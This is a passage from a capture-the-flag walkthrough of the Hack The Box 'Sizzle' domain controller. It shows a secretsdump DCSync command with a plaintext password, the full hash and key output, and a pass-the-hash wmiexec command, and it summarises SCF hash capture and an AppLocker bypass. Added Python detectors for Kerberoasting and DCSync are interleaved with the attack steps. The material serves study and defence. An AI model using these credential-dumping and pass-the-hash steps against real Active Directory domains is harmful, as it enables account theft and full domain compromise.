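{"TimeCreated":"2023-01-30T08:02:15","TargetUserName":"amanda@HTB.LOCAL","ServiceName":"mrlky","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.129.4.80","Status":"0x0"}
{"TimeCreated":"2023-01-30T08:02:16","TargetUserName":"amanda@HTB.LOCAL","ServiceName":"svc_sql","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.129.4.80","Status":"0x0"}
{"TimeCreated":"2023-01-30T08:02:17","TargetUserName":"amanda@HTB.LOCAL","ServiceName":"svc_backup","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.129.4.80","Status":"0x0"}
{"TimeCreated":"2023-01-30T08:30:00","TargetUserName":"mrb3n@HTB.LOCAL","ServiceName":"krbtgt","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.129.4.81","Status":"0x0"}
{"TimeCreated":"2023-01-30T08:31:00","TargetUserName":"mrb3n@HTB.LOCAL","ServiceName":"svc_sql","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.129.4.81","Status":"0x0"}
"""


def parse_events(text):
    """Parse JSON-lines 4769 records; normalise the timestamp and the encryption type."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        e = json.loads(line)
        e["TimeCreated"] = datetime.fromisoformat(e["TimeCreated"])
        e["TicketEncryptionType"] = int(e["TicketEncryptionType"], 16)
        events.append(e)
    return events


def is_user_spn_service(service_name):
    """Machine accounts (trailing $) and krbtgt have long random keys and are not
    crackable targets; Kerberoast goes after user accounts that carry an SPN."""
    n = service_name.lower()
    return not n.endswith("$") and n != "krbtgt"


def detect_kerberoast(events):
    """Two rules: (1) any successful RC4 TGS for a user-account SPN,
    (2) one account collecting tickets for many user-account SPNs in a short window."""
    findings = []
    per_user = defaultdict(list)
    for e in sorted(events, key=lambda x: x["TimeCreated"]):
        if e["Status"] != "0x0" or not is_user_spn_service(e["ServiceName"]):
            continue
        if e["TicketEncryptionType"] == RC4_HMAC:
            findings.append({
                "rule": "rc4_tgs_for_user_spn",
                "user": e["TargetUserName"],
                "service": e["ServiceName"],
                "client": e["IpAddress"],
                "time": e["TimeCreated"].isoformat(),
            })
        per_user[e["TargetUserName"]].append(e)
    for user, evs in per_user.items():
        # sliding window anchored at each request; report the first window that trips the threshold
        for i, start in enumerate(evs):
            window = [x for x in evs[i:] if x["TimeCreated"] - start["TimeCreated"] <= SWEEP_WINDOW]
            services = {x["ServiceName"].lower() for x in window}
            if len(services) >= SWEEP_THRESHOLD:
                findings.append({
                    "rule": "spn_sweep",
                    "user": user,
                    "services": sorted(services),
                    "time": start["TimeCreated"].isoformat(),
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect_kerberoast(parse_events(SAMPLE_4769)):
        print(f)
```

In the sample, amanda's RC4 request for mrlky's SPN (the http/sizzle ticket exported above) fires rule 1, and her three requests within two seconds fire rule 2; mrb3n's krbtgt and AES requests stay quiet. Moving service accounts to AES-only keys (msDS-SupportedEncryptionTypes) turns every attacker downgrade into a loud 0x17 anomaly, which is why rule 1 is worth keeping even when noisy at first.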


Dumping hashes with DCSync

Use impacket-impacket_0_9_22/examples/secretsdump.py for the DCSync. From the earlier analysis, http/sizzle is an SPN set on mrlky, so the exported TGS ticket was encrypted with mrlky's hash and its password could be cracked.
BloodHound had shown that mrlky holds DCSync rights; abusing them yields the domain administrator's hash, which is then used for pass-the-hash.
Command: python3 secretsdump.py 'mrlky:Football#7@10.129.2.190'
Output:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:ac4f44d8819e4ac2412cd5de91f311f2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:70e59ac349d2ba9b9a4f69b3dac3da09c1c9dd71119d42a37ab17e50c65b4433
SIZZLE$:aes128-cts-hmac-sha1-96:00b7d18f2f0e94f6c4eb7771c18d1a8b
SIZZLE$:des-cbc-md5:ec2c32cd75808007
[*] Cleaning up...
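Added example, not from the original write-up: detecting the DCSync step from Windows Security event 4662 (operation performed on an object). A replication request shows up as a Control Access operation on the domain object whose Properties list the DS-Replication-Get-Changes extended-right GUIDs; any subject other than a domain controller computer account (or another vetted replicator) performing it is a finding. The GUIDs are the well-known AD control-access rights; the ALLOWED_REPLICATORS set and the sample events are constructed.

```python
import json
import re

# Well-known control-access right GUIDs that together permit directory replication (DCSync)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: principals that legitimately replicate. Domain controller computer accounts
# always do; sync connectors or backup agents would be added here after review. Constructed.
ALLOWED_REPLICATORS = {"sizzle$"}

GUID_RE = re.compile(r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.IGNORECASE)

# Constructed sample 4662 events as JSON lines. Properties mirrors the event's multi-line field.
SAMPLE_4662 = """
{"TimeCreated":"2023-01-30T09:12:01","SubjectUserName":"SIZZLE$","SubjectDomainName":"HTB","ObjectType":"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}","Properties":"Control Access\\n\\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\\n\\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}","AccessMask":"0x100"}
{"TimeCreated":"2023-01-30T09:15:44","SubjectUserName":"mrlky","SubjectDomainName":"HTB","ObjectType":"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}","Properties":"Control Access\\n\\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\\n\\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\\n\\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}","AccessMask":"0x100"}
{"TimeCreated":"2023-01-30T09:20:00","SubjectUserName":"amanda","SubjectDomainName":"HTB","ObjectType":"%{bf967aba-0de6-11d0-a285-00aa003049e2}","Properties":"Read Property\\n\\t{bf967a0a-0de6-11d0-a285-00aa003049e2}","AccessMask":"0x10"}
"""


def parse_events(text):
    """Parse JSON-lines 4662 records."""
    return [json.loads(l) for l in text.splitlines() if l.strip()]


def replication_rights(properties):
    """Names of the replication rights referenced in a 4662 Properties field (sorted)."""
    guids = {g.lower() for g in GUID_RE.findall(properties or "")}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def detect_dcsync(events):
    """Flag replication-right use by any subject that is not an allowed replicator."""
    findings = []
    for e in events:
        rights = replication_rights(e.get("Properties"))
        if not rights:
            continue
        subject = e["SubjectUserName"].lower()
        if subject in ALLOWED_REPLICATORS:
            continue
        findings.append({
            "user": f"{e['SubjectDomainName']}\\{e['SubjectUserName']}",
            "rights": rights,
            "time": e["TimeCreated"],
        })
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(parse_events(SAMPLE_4662)):
        print(f"{f['time']} {f['user']} used {', '.join(f['rights'])}")
```

Auditing "Directory Service Access" must be enabled on the domain controllers and the domain object's SACL must audit Control Access for Everyone, otherwise 4662 is never written; the allowlist is the only tuning the rule needs, since legitimate replicators are a short, known set.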

Pass-the-hash to SYSTEM

Use wmiexec with the Administrator hash to get SYSTEM
Command: python3 wmiexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 administrator@10.129.2.190
SYSTEM privileges obtained

Summary

The nmap scan shows the target is a domain controller with FTP open. Anonymous FTP login works, and smbclient shows the shares can be listed anonymously; Users/Public in Department Shares is writable, so a malicious .scf file is dropped there. With Responder.py listening on the attack machine, amanda's Net-NTLMv2 hash is captured and cracked with hashcat. smbmap is used to check the account's SMB share permissions, and the CertEnroll share holds a lot of certificate material of little value. BloodHound analysis shows amanda belongs to REMOTE MANAGEMENT USERS@HTB.LOCAL and can log in remotely, and that MRLKY@HTB.LOCAL in the same group has DCSync rights. Certificate-based WinRM login yields a constrained PowerShell shell; PSByPassCLM bypasses CLM, but Group Policy prevents running exes directly, so AppLocker also has to be bypassed; MSBuild, which compiles XML C# project files, gets around the AppLocker restriction and a Cobalt Strike beacon is obtained. GetUserSPNs.py shows MRLKY has an SPN configured; mimikatz loaded in memory exports the TGS ticket for Kerberoasting, tgsrepcrack.py cracks MRLKY's password, secretsdump.py performs DCSync to obtain the domain administrator hash, and pass-the-hash gives SYSTEM on the domain controller.

Source: http://www.ppmy.cn/news/425775.html
